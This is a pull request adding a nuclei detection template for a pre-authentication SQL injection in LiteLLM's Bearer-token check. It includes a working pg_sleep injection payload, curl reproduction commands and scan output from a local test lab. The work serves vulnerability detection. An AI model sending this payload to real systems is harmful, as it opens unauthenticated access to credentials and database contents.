### PR TITLE
Add CVE-2026-42208 - BerriAI LiteLLM Pre-Authentication Time-Based SQL Injection

### DIFF
--- a/http/cves/2026/CVE-2026-42208.yaml
+++ b/http/cves/2026/CVE-2026-42208.yaml
@@ -1,26 +1,22 @@
 id: CVE-2026-42208
 
 info:
-  name: BerriAI LiteLLM - Pre-Authentication Time-Based SQL Injection
+  name: LiteLLM - SQL Injection
   author: HAERIN-L
   severity: critical
   description: |
-    BerriAI LiteLLM versions >= 1.81.16 and < 1.83.7 contain a pre-authentication SQL
-    injection vulnerability via the Authorization Bearer token. When a token that does not
-    start with "sk-" is supplied, it bypasses hashing and is concatenated unsanitized into
-    a raw PostgreSQL f-string: WHERE v.token = '{token}'. An attacker can inject arbitrary
-    SQL expressions such as pg_sleep() to confirm the vulnerability without any credentials.
+    LiteLLM 1.81.16 to < 1.83.7 contains a SQL injection caused by improper handling of caller-supplied key in database query during proxy API key checks, letting unauthenticated attackers read and modify database data, exploit requires crafted Authorization header.
   impact: |
-    Unauthenticated attackers can read, modify, or delete all data in the LiteLLM
-    PostgreSQL database, including API keys, user credentials, and billing records.
-  remediation: Upgrade to LiteLLM >= 1.83.7 where the query uses parameterized inputs ($1).
+    Unauthenticated attackers can read and modify proxy database, leading to unauthorized access and credential compromise.
+  remediation: |
+    Upgrade to version 1.83.7 or later.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-42208
     - https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc
     - https://www.sysdig.com/blog/cve-2026-42208-critical-sql-injection-litellm/
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-42208
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 9.3
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2026-42208
     cwe-id: CWE-89
   metadata:
@@ -29,7 +25,9 @@ info:
     vendor: BerriAI
     product: LiteLLM
     shodan-query: http.title:"LiteLLM"
-  tags: cve,cve2026,sqli,litellm,ai-gateway,time-based,preauth
+  tags: cve,cve2026,litellm,sqli,unauthenticated
+
+flow: http(1) && http(2)
 
 http:
   - raw:
@@ -41,21 +39,24 @@ http:
 
         {}
 
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 401'
+        internal: true
+
+  - raw:
       - |
         POST /v1/chat/completions HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
-        Authorization: Bearer ' OR (SELECT pg_sleep(6)) IS NOT NULL --
+        Authorization: Bearer {{randstr}}' OR (SELECT pg_sleep(6)) IS NOT NULL --
 
         {}
 
-    req-condition: true
-    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - "status_code_1 == 401 && status_code_2 == 401"
-
-      - type: dsl
-        dsl:
-          - "duration_2 >= duration_1 + 5.5"
+          - 'status_code == 401'
+          - 'duration >= 6'
+        condition: and

--- a/http/cves/2026/CVE-2026-42208.yaml
+++ b/http/cves/2026/CVE-2026-42208.yaml
@@ -1,0 +1,61 @@
+id: CVE-2026-42208
+
+info:
+  name: BerriAI LiteLLM - Pre-Authentication Time-Based SQL Injection
+  author: HAERIN-L
+  severity: critical
+  description: |
+    BerriAI LiteLLM versions >= 1.81.16 and < 1.83.7 contain a pre-authentication SQL
+    injection vulnerability via the Authorization Bearer token. When a token that does not
+    start with "sk-" is supplied, it bypasses hashing and is concatenated unsanitized into
+    a raw PostgreSQL f-string: WHERE v.token = '{token}'. An attacker can inject arbitrary
+    SQL expressions such as pg_sleep() to confirm the vulnerability without any credentials.
+  impact: |
+    Unauthenticated attackers can read, modify, or delete all data in the LiteLLM
+    PostgreSQL database, including API keys, user credentials, and billing records.
+  remediation: Upgrade to LiteLLM >= 1.83.7 where the query uses parameterized inputs ($1).
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-42208
+    - https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc
+    - https://www.sysdig.com/blog/cve-2026-42208-critical-sql-injection-litellm/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.3
+    cve-id: CVE-2026-42208
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: BerriAI
+    product: LiteLLM
+    shodan-query: http.title:"LiteLLM"
+  tags: cve,cve2026,sqli,litellm,ai-gateway,time-based,preauth
+
+http:
+  - raw:
+      - |
+        POST /v1/chat/completions HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Authorization: Bearer invalid_token_baseline_test
+
+        {}
+
+      - |
+        POST /v1/chat/completions HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Authorization: Bearer ' OR (SELECT pg_sleep(6)) IS NOT NULL --
+
+        {}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 401 && status_code_2 == 401"
+
+      - type: dsl
+        dsl:
+          - "duration_2 >= duration_1 + 5.5"


### PR DESCRIPTION
Adds a nuclei template for detecting pre-authentication time-based SQL injection in BerriAI LiteLLM via the
  Authorization Bearer token.

  When a token that does not start with `sk-` is supplied, LiteLLM bypasses hashing and concatenates the raw token
  into a PostgreSQL f-string: `WHERE v.token = '{token}'`. The template sends two requests — a baseline and a
  `pg_sleep(6)` injection — and matches when the injected response is delayed by at least 5.5 seconds relative to the
  baseline, confirming the injection executed.

  ### PR Information

  - Added CVE-2026-42208 template for BerriAI LiteLLM pre-authentication SQL injection.
  - Vulnerable endpoint: `/v1/chat/completions`
  - Vulnerable parameter: `Authorization: Bearer` (non-`sk-` prefix bypasses hashing)
  - Remediation: upgrade LiteLLM to v1.83.7 or later (parameterized query).
  - References:
    - https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42208

  ### Template Validation
  
  - [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
  - [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

  #### Additional Details

  Validated against a local Docker reproduction lab:

   - https://github.com/HAERIN-L/poc_cve-2026-42208

  Local validation targets:
  
  - Vulnerable target, LiteLLM v1.83.6-nightly: `http://127.0.0.1:8010`
  - Patched target, LiteLLM v1.83.7-stable: `http://127.0.0.1:8011`

  Template validation:

```
  nuclei -validate -t http/cves/2026/CVE-2026-42208.yaml

  [INF] All templates validated successfully
```
Manual timing comparison on the local vulnerable target:

```
  curl -o /dev/null -s -w "%{time_total}s\n" -X POST http://127.0.0.1:8010/v1/chat/completions \
    -H "Content-Type: application/json" \
    -H "Authorization: Bearer invalid_token_baseline_test" \
    -d '{}'
  # 0.031s  (baseline)

  curl -o /dev/null -s -w "%{time_total}s\n" -X POST http://127.0.0.1:8010/v1/chat/completions \
    -H "Content-Type: application/json" \
    -H "Authorization: Bearer ' OR (SELECT pg_sleep(6)) IS NOT NULL --" \
    -d '{}'
  # 6.062s  (pg_sleep fired — delta: +6.031s)  
```

  True-positive validation:

  ```
nuclei -u http://127.0.0.1:8010 -t http/cves/2026/CVE-2026-42208.yaml

  [CVE-2026-42208] [http] [critical] http://127.0.0.1:8010/v1/chat/completions
  [INF] Scan completed in 6.065657416s. 1 matches found.
```

  False-positive validation against patched v1.83.7:

  ```
nuclei -u http://127.0.0.1:8011 -t http/cves/2026/CVE-2026-42208.yaml

  [INF] Scan completed in 44.962417ms. No results found.
```
  
  The template uses two-request relative timing comparison (`duration_2 >= duration_1 + 5.5`) to prevent slow-network
  false positives. Status code check (`401` on both requests) prevents 504/502 false positives.
  
### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)